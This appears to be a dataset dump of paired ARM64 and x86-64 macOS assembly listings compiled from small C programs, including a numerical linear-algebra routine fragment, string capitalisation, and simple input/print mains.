movl %eax, -128(%rbp)
movl -128(%rbp), %eax
subl -236(%rbp), %eax
addl $1, %eax
movl %eax, -224(%rbp)
movl -256(%rbp), %eax
subl $1, %eax
movl %eax, -136(%rbp)
LBB0_185: ## Parent Loop BB0_183 Depth=1
## => This Inner Loop Header: Depth=2
movl -136(%rbp), %eax
movq 40(%rbp), %rcx
cmpl (%rcx), %eax
jge LBB0_189
## %bb.186: ## in Loop: Header=BB0_185 Depth=2
movq 112(%rbp), %rax
movl -240(%rbp), %ecx
addl -136(%rbp), %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
cmpl -132(%rbp), %eax
jne LBB0_188
## %bb.187: ## in Loop: Header=BB0_185 Depth=2
movl -136(%rbp), %eax
addl $1, %eax
movl %eax, -136(%rbp)
jmp LBB0_185
LBB0_188: ## in Loop: Header=BB0_183 Depth=1
jmp LBB0_189
LBB0_189: ## in Loop: Header=BB0_183 Depth=1
movl -136(%rbp), %eax
cmpl -256(%rbp), %eax
jge LBB0_191
## %bb.190: ## in Loop: Header=BB0_183 Depth=1
movl -128(%rbp), %eax
addl $1, %eax
movl %eax, -236(%rbp)
jmp LBB0_192
LBB0_191: ## in Loop: Header=BB0_183 Depth=1
movq 112(%rbp), %rax
movl -192(%rbp), %ecx
addl -256(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
subl $1, %eax
movl %eax, -284(%rbp)
movq 112(%rbp), %rax
movl -192(%rbp), %ecx
addl -256(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -296(%rbp)
movq 112(%rbp), %rax
movl -192(%rbp), %ecx
addl -136(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -196(%rbp)
movss LCPI0_2(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
mulss -340(%rbp), %xmm0
movss %xmm0, -168(%rbp)
movq 96(%rbp), %rsi
movl -124(%rbp), %eax
addl -236(%rbp), %eax
subl $1, %eax
cltq
shlq $2, %rax
addq %rax, %rsi
movq 96(%rbp), %rdx
movl -156(%rbp), %eax
addl -236(%rbp), %eax
subl $1, %eax
cltq
shlq $2, %rax
addq %rax, %rdx
movq 48(%rbp), %r12
movslq -256(%rbp), %rax
shlq $2, %rax
addq %rax, %r12
movq 96(%rbp), %r15
movl -272(%rbp), %eax
addl -256(%rbp), %eax
subl $1, %eax
cltq
shlq $2, %rax
addq %rax, %r15
movq 96(%rbp), %r14
movslq -292(%rbp), %rax
shlq $2, %rax
addq %rax, %r14
movq 112(%rbp), %rbx
movslq -276(%rbp), %rax
shlq $2, %rax
addq %rax, %rbx
leaq -224(%rbp), %rdi
leaq -296(%rbp), %rcx
leaq -196(%rbp), %r8
leaq -168(%rbp), %r9
leaq -284(%rbp), %r13
leaq -308(%rbp), %r11
leaq -152(%rbp), %r10
leaq -188(%rbp), %rax
movq %r13, (%rsp)
movq %r12, 8(%rsp)
movq %r15, 16(%rsp)
movq %r14, 24(%rsp)
movq %rbx, 32(%rsp)
movq %r11, 40(%rsp)
movq %r10, 48(%rsp)
movq %rax, 56(%rsp)
callq _slarrj_
movl -128(%rbp), %eax
addl $1, %eax
movl %eax, -236(%rbp)
movl -136(%rbp), %eax
addl $1, %eax
movl %eax, -256(%rbp)
LBB0_192: ## in Loop: Header=BB0_183 Depth=1
jmp LBB0_193
LBB0_193: ## in Loop: Header=BB0_183 Depth=1
movl -132(%rbp), %eax
addl $1, %eax
movl %eax, -132(%rbp)
jmp LBB0_183
LBB0_194:
jmp LBB0_195
LBB0_195:
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss LCPI0_1(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
jne LBB0_196
jp LBB0_196
jmp LBB0_197
LBB0_196:
movss LCPI0_1(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
divss -180(%rbp), %xmm0
movss %xmm0, -116(%rbp)
movq 40(%rbp), %rdi
movq 48(%rbp), %rdx
addq $4, %rdx
leaq -116(%rbp), %rsi
leaq _c__1(%rip), %rcx
callq _sscal_
LBB0_197:
jmp LBB0_198
LBB0_198:
cmpl $1, -316(%rbp)
jg LBB0_200
## %bb.199:
movq -72(%rbp), %rax
cmpl $2, (%rax)
jne LBB0_220
LBB0_200:
cmpl $0, -204(%rbp)
jne LBB0_204
## %bb.201:
movq 40(%rbp), %rsi
movq 48(%rbp), %rdx
addq $4, %rdx
leaq L_.str.2(%rip), %rdi
leaq -188(%rbp), %rcx
callq _slasrt_
cmpl $0, -188(%rbp)
je LBB0_203
## %bb.202:
movq 128(%rbp), %rax
movl $3, (%rax)
movl $0, -44(%rbp)
jmp LBB0_221
LBB0_203:
jmp LBB0_219
LBB0_204:
movq 40(%rbp), %rax
movl (%rax), %eax
subl $1, %eax
movl %eax, -108(%rbp)
movl $1, -176(%rbp)
LBB0_205: ## =>This Loop Header: Depth=1
## Child Loop BB0_207 Depth 2
movl -176(%rbp), %eax
cmpl -108(%rbp), %eax
jg LBB0_218
## %bb.206: ## in Loop: Header=BB0_205 Depth=1
movl $0, -172(%rbp)
movq 48(%rbp), %rax
movslq -176(%rbp), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -344(%rbp)
movq 40(%rbp), %rax
movl (%rax), %eax
movl %eax, -112(%rbp)
movl -176(%rbp), %eax
addl $1, %eax
movl %eax, -216(%rbp)
LBB0_207: ## Parent Loop BB0_205 Depth=1
## => This Inner Loop Header: Depth=2
movl -216(%rbp), %eax
cmpl -112(%rbp), %eax
jg LBB0_212
## %bb.208: ## in Loop: Header=BB0_207 Depth=2
movq 48(%rbp), %rax
movslq -216(%rbp), %rcx
movss (%rax,%rcx,4), %xmm1 ## xmm1 = mem[0],zero,zero,zero
movss -344(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
jbe LBB0_210
## %bb.209: ## in Loop: Header=BB0_207 Depth=2
movl -216(%rbp), %eax
movl %eax, -172(%rbp)
movq 48(%rbp), %rax
movslq -216(%rbp), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -344(%rbp)
LBB0_210: ## in Loop: Header=BB0_207 Depth=2
jmp LBB0_211
LBB0_211: ## in Loop: Header=BB0_207 Depth=2
movl -216(%rbp), %eax
addl $1, %eax
movl %eax, -216(%rbp)
jmp LBB0_207
LBB0_212: ## in Loop: Header=BB0_205 Depth=1
cmpl $0, -172(%rbp)
je LBB0_216
## %bb.213: ## in Loop: Header=BB0_205 Depth=1
movq 48(%rbp), %rax
movslq -176(%rbp), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 48(%rbp), %rax
movslq -172(%rbp), %rcx
movss %xmm0, (%rax,%rcx,4)
movss -344(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq 48(%rbp), %rax
movslq -176(%rbp), %rcx
movss %xmm0, (%rax,%rcx,4)
cmpl $0, -204(%rbp)
je LBB0_215
## %bb.214: ## in Loop: Header=BB0_205 Depth=1
movq -72(%rbp), %rdi
movq 56(%rbp), %rsi
movl -172(%rbp), %eax
imull -100(%rbp), %eax
addl $1, %eax
cltq
shlq $3, %rax
addq %rax, %rsi
movq 56(%rbp), %rcx
movl -176(%rbp), %eax
imull -100(%rbp), %eax
addl $1, %eax
cltq
shlq $3, %rax
addq %rax, %rcx
leaq _c__1(%rip), %r8
movq %r8, %rdx
callq _cswap_
movq 80(%rbp), %rax
movl -172(%rbp), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -148(%rbp)
movq 80(%rbp), %rax
movl -176(%rbp), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %edx
movq 80(%rbp), %rax
movl -172(%rbp), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
movl -148(%rbp), %edx
movq 80(%rbp), %rax
movl -176(%rbp), %ecx
shll $1, %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
movq 80(%rbp), %rax
movl -172(%rbp), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -148(%rbp)
movq 80(%rbp), %rax
movl -176(%rbp), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %edx
movq 80(%rbp), %rax
movl -172(%rbp), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
movl -148(%rbp), %edx
movq 80(%rbp), %rax
movl -176(%rbp), %ecx
shll $1, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
LBB0_215: ## in Loop: Header=BB0_205 Depth=1
jmp LBB0_216
LBB0_216: ## in Loop: Header=BB0_205 Depth=1
jmp LBB0_217
LBB0_217: ## in Loop: Header=BB0_205 Depth=1
movl -176(%rbp), %eax
addl $1, %eax
movl %eax, -176(%rbp)
jmp LBB0_205
LBB0_218:
jmp LBB0_219
LBB0_219:
jmp LBB0_220
LBB0_220:
cvtsi2ssl -200(%rbp), %xmm0
movq 96(%rbp), %rax
movss %xmm0, 4(%rax)
movl -300(%rbp), %ecx
movq 112(%rbp), %rax
movl %ecx, 4(%rax)
movl $0, -44(%rbp)
LBB0_221:
movl -44(%rbp), %eax
addq $680, %rsp ## imm = 0x2A8
popq %rbx
popq %r12
popq %r13
popq %r14
popq %r15
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "V"
L_.str.1: ## @.str.1
.asciz "A"
L_.str.2: ## @.str.2
.asciz "I"
L_.str.3: ## @.str.3
.asciz "N"
L_.str.4: ## @.str.4
.asciz "Safe minimum"
L_.str.5: ## @.str.5
.asciz "Precision"
L_.str.6: ## @.str.6
.asciz "T"
L_.str.7: ## @.str.7
.asciz "CSTEMR"
L_.str.8: ## @.str.8
.asciz "M"
.section __DATA,__data
.p2align 2 ## @c__1
_c__1:
.long 1 ## 0x1
.p2align 2 ## @c_b18
_c_b18:
.long 0x3b449ba6 ## float 0.00300000003
.subsections_via_symbols
| the_stack_data/75139039.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _test_bool_no_false ; -- Begin function test_bool_no_false
.p2align 2
_test_bool_no_false: ; @test_bool_no_false
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
ldrb w8, [sp, #15]
and w0, w8, #0x1
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _test_bool_with_false ; -- Begin function test_bool_with_false
.p2align 2
_test_bool_with_false: ; @test_bool_with_false
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
ldrb w8, [sp, #15]
and w0, w8, #0x1
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _test_bool_with_false_undefined ; -- Begin function test_bool_with_false_undefined
.p2align 2
_test_bool_with_false_undefined: ; @test_bool_with_false_undefined
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
ldrb w8, [sp, #15]
and w0, w8, #0x1
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _test_bool_no_false ## -- Begin function test_bool_no_false
.p2align 4, 0x90
_test_bool_no_false: ## @test_bool_no_false
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb -1(%rbp), %al
andb $1, %al
movzbl %al, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _test_bool_with_false ## -- Begin function test_bool_with_false
.p2align 4, 0x90
_test_bool_with_false: ## @test_bool_with_false
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb -1(%rbp), %al
andb $1, %al
movzbl %al, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _test_bool_with_false_undefined ## -- Begin function test_bool_with_false_undefined
.p2align 4, 0x90
_test_bool_with_false_undefined: ## @test_bool_with_false_undefined
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb -1(%rbp), %al
andb $1, %al
movzbl %al, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/192329830.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ft_strcapitalize ; -- Begin function ft_strcapitalize
.p2align 2
_ft_strcapitalize: ; @ft_strcapitalize
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
str wzr, [sp, #4]
mov w8, #1
str w8, [sp]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_20
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #48
cset w8, lt
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #57
cset w8, le
tbnz w8, #0, LBB0_8
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #97
cset w8, lt
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #122
cset w8, le
tbnz w8, #0, LBB0_8
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #65
cset w8, lt
tbnz w8, #0, LBB0_18
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #90
cset w8, gt
tbnz w8, #0, LBB0_18
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_12
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #97
cset w8, lt
tbnz w8, #0, LBB0_12
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #122
cset w8, gt
tbnz w8, #0, LBB0_12
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #32
ldr x9, [sp, #8]
ldrsw x10, [sp, #4]
strb w8, [x9, x10]
b LBB0_17
LBB0_12: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_16
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #65
cset w8, lt
tbnz w8, #0, LBB0_16
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #90
cset w8, gt
tbnz w8, #0, LBB0_16
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
add w8, w8, #32
ldr x9, [sp, #8]
ldrsw x10, [sp, #4]
strb w8, [x9, x10]
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_1 Depth=1
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_1 Depth=1
str wzr, [sp]
b LBB0_19
LBB0_18: ; in Loop: Header=BB0_1 Depth=1
mov w8, #1
str w8, [sp]
b LBB0_19
LBB0_19: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB0_1
LBB0_20:
ldr x0, [sp, #8]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ft_strcapitalize ## -- Begin function ft_strcapitalize
.p2align 4, 0x90
_ft_strcapitalize: ## @ft_strcapitalize
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
movl $1, -16(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
je LBB0_20
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $48, %eax
jl LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $57, %eax
jle LBB0_8
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $97, %eax
jl LBB0_6
## %bb.5: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $122, %eax
jle LBB0_8
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $65, %eax
jl LBB0_18
## %bb.7: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $90, %eax
jg LBB0_18
LBB0_8: ## in Loop: Header=BB0_1 Depth=1
cmpl $0, -16(%rbp)
je LBB0_12
## %bb.9: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $97, %eax
jl LBB0_12
## %bb.10: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $122, %eax
jg LBB0_12
## %bb.11: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
subl $32, %eax
movb %al, %dl
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movb %dl, (%rax,%rcx)
jmp LBB0_17
LBB0_12: ## in Loop: Header=BB0_1 Depth=1
cmpl $0, -16(%rbp)
jne LBB0_16
## %bb.13: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $65, %eax
jl LBB0_16
## %bb.14: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $90, %eax
jg LBB0_16
## %bb.15: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
addl $32, %eax
movb %al, %dl
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movb %dl, (%rax,%rcx)
LBB0_16: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_17
LBB0_17: ## in Loop: Header=BB0_1 Depth=1
movl $0, -16(%rbp)
jmp LBB0_19
LBB0_18: ## in Loop: Header=BB0_1 Depth=1
movl $1, -16(%rbp)
LBB0_19: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_1
LBB0_20:
movq -8(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/33635.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #16] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
mov x9, sp
sub x8, x29, #8
str x8, [x9]
sub x8, x29, #12
str x8, [x9, #8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
add w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldr w0, [sp, #16] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%i%i"
l_.str.1: ; @.str.1
.asciz "%i\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
leaq -8(%rbp), %rsi
leaq -12(%rbp), %rdx
movb $0, %al
callq _scanf
movl -8(%rbp), %esi
addl -12(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%i%i"
L_.str.1: ## @.str.1
.asciz "%i\n"
.subsections_via_symbols
| the_stack_data/103345.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sub sp, sp, #96
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-12]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
; Child Loop BB0_5 Depth 3
; Child Loop BB0_11 Depth 2
; Child Loop BB0_13 Depth 3
sub sp, sp, #16
mov x9, sp
sub x8, x29, #16
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
add sp, sp, #16
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_21
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-16]
mov x9, x8
stur x9, [x29, #-72] ; 8-byte Folded Spill
ldur w8, [x29, #-16]
; kill: def $x8 killed $w8
stur x8, [x29, #-88] ; 8-byte Folded Spill
mov x10, sp
stur x10, [x29, #-32]
mul x9, x9, x8
lsl x9, x9, #2
add x9, x9, #15
and x9, x9, #0xfffffffffffffff0
stur x9, [x29, #-80] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x11, [x29, #-80] ; 8-byte Folded Reload
ldur x9, [x29, #-72] ; 8-byte Folded Reload
mov x10, sp
subs x10, x10, x11
mov sp, x10
stur x10, [x29, #-64] ; 8-byte Folded Spill
stur x9, [x29, #-40]
stur x8, [x29, #-48]
stur wzr, [x29, #-20]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_5 Depth 3
ldur w8, [x29, #-20]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_10
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
mov w8, #1
stur w8, [x29, #-52]
ldur w8, [x29, #-20]
stur w8, [x29, #-24]
b LBB0_5
LBB0_5: ; Parent Loop BB0_1 Depth=1
; Parent Loop BB0_3 Depth=2
; => This Inner Loop Header: Depth=3
ldur w8, [x29, #-24]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=3
ldur x9, [x29, #-64] ; 8-byte Folded Reload
ldur x11, [x29, #-88] ; 8-byte Folded Reload
ldur w8, [x29, #-52]
ldursw x10, [x29, #-20]
mul x10, x10, x11
add x10, x9, x10, lsl #2
ldursw x12, [x29, #-24]
str w8, [x10, x12, lsl #2]
ldur w8, [x29, #-52]
ldursw x10, [x29, #-24]
mul x10, x10, x11
add x9, x9, x10, lsl #2
ldursw x10, [x29, #-20]
str w8, [x9, x10, lsl #2]
ldur w8, [x29, #-52]
add w8, w8, #1
stur w8, [x29, #-52]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=3
ldur w8, [x29, #-24]
add w8, w8, #1
stur w8, [x29, #-24]
b LBB0_5
LBB0_8: ; in Loop: Header=BB0_3 Depth=2
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_3 Depth=2
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB0_3
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
stur wzr, [x29, #-20]
b LBB0_11
LBB0_11: ; Parent Loop BB0_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_13 Depth 3
ldur w8, [x29, #-20]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_20
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_11 Depth=2
stur wzr, [x29, #-24]
b LBB0_13
LBB0_13: ; Parent Loop BB0_1 Depth=1
; Parent Loop BB0_11 Depth=2
; => This Inner Loop Header: Depth=3
ldur w8, [x29, #-24]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_18
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_13 Depth=3
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_16
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_13 Depth=3
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_13 Depth=3
ldur x8, [x29, #-64] ; 8-byte Folded Reload
ldur x10, [x29, #-88] ; 8-byte Folded Reload
ldursw x9, [x29, #-20]
mul x9, x9, x10
add x8, x8, x9, lsl #2
ldursw x9, [x29, #-24]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
sub sp, sp, #16
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
add sp, sp, #16
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_13 Depth=3
ldur w8, [x29, #-24]
add w8, w8, #1
stur w8, [x29, #-24]
b LBB0_13
LBB0_18: ; in Loop: Header=BB0_11 Depth=2
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_19
LBB0_19: ; in Loop: Header=BB0_11 Depth=2
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB0_11
LBB0_20: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
ldur x8, [x29, #-32]
mov sp, x8
b LBB0_1
LBB0_21:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
